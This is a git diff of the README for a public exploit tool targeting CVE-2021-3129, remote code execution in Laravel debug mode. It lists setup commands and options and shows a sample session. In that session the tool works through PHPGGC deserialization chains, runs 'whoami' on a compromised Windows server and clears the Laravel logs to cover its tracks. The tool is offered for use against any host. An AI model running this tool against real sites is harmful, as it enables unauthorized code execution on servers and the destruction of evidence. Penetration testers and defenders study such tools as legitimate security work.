diff --git a/README.md b/README.md index 02cf023..ae8753b 100644 --- a/README.md +++ b/README.md @@ -7,90 +7,78 @@ This script allows you to write/execute commands on a website running Laravel It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files. ## Setup -``` +```bash $ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git $ cd CVE-2021-3129 -# pip install -r requirements.txt -# python3 CVE-2021-3129.py --help +$ pip install -r requirements.txt +$ python3 CVE-2021-3129.py --help ``` ## Options -``` -usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua] - [--chain CHAIN] [--chains] [--php PHP] +```bash +usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua] [--chain CHAIN] [--chains] [--php PHP] Exploit CVE-2021-3129 - Laravel vulnerability exploit script -optional arguments: +options: -h, --help show this help message and exit --host HOST Host URL to use exploit on --force Force exploit without checking if vulnerable - --log LOG Full path to laravel.log file (e.g. - /var/www/html/storage/logs/laravel.log) + --log LOG Full path to laravel.log file (e.g. /var/www/html/storage/logs/laravel.log) --ua Randomize User-Agent for requests - --chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all - available chains. + --chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all available chains. --chains View available chains for the "--chain" parameter --php PHP Path to PHP executable ``` ## Example -``` -$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/ +```bash +$ python3 CVE-2021-3129.py --host="http://0.0.0.0/" Laravel Debug Mode CVE script -[•] Made by: https://jvdpoll.nl -[@] Starting exploit on "http://127.0.0.1/public/"... -[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution... +[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129 +[•] Using PHPGGC: https://github.com/ambionics/phpggc +[@] Starting exploit on "http://0.0.0.0/"... +[@] Testing vulnerable URL http://0.0.0.0/_ignition/execute-solution... [√] Host seems vulnerable! [@] Searching Laravel log file path... -[•] Log path found: "/home/laravel/web/storage/logs/laravel.log" -[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log". -[•] Laravel version found: "7.22.4". -[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log". +[•] Laravel seems to be running on a Windows based machine. +[√] Laravel log found: "C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log". +[•] Laravel version found: "7.30.4". [•] Use "?" for a list of all possible actions. -[?] Please enter a command to execute: help -[•] Available commands: - exit - Exit program. - help - Shows available commands. - clear_logs - Clears Laravel logs. - execute - Execute system command. - write - Write to log file. -[?] Please enter a command to execute: execute ls /home/laravel/web/ -[@] Executing command "ls /home/laravel/web/"... -[@] Generating payload... -[√] Generated payload. +[?] Please enter a command to execute: execute whoami +[@] Executing command "whoami"... +[@] Generating payloads... +[√] Generated 12 payloads. +[@] Trying chain laravel/rce1 [1/12]... +[@] Clearing logs... +[@] Causing error in logs... +[√] Caused error in logs. +[@] Sending payloads... +[√] Sent payload. +[@] Converting payload... +[√] Converted payload. +[!] Failed execution of payload. +Error: "file_get_contents(phar://C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log): failed to open stream: internal corruption of phar "C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log" (truncated entry)". +[?] Do you want to try the next chain? [Y/N] : y +... +[@] Trying chain laravel/rce8 [6/12]... [@] Clearing logs... -[√] Cleared logs. [@] Causing error in logs... [√] Caused error in logs. -[@] Sending payload... +[@] Sending payloads... [√] Sent payload. [@] Converting payload... [√] Converted payload. [√] Result: -README.md -app -artisan -bootstrap -composer.json -composer.lock -config -database -package.json -phpunit.xml -public -resources -routes -server.php -storage -tests -vendor -webpack.mix.js +autorite nt\iusr [@] Clearing logs... -[√] Cleared logs. +[?] Do you want to try the next chain? [Y/N] : n +[?] Please enter a command to execute: clear_logs +[@] Clearing Laravel logs... +[√] Cleared Laravel logs! ``` ## Credits -- [PHPGGC](https://github.com/ambionics/phpggc) \ No newline at end of file +- [PHPGGC](https://github.com/ambionics/phpggc)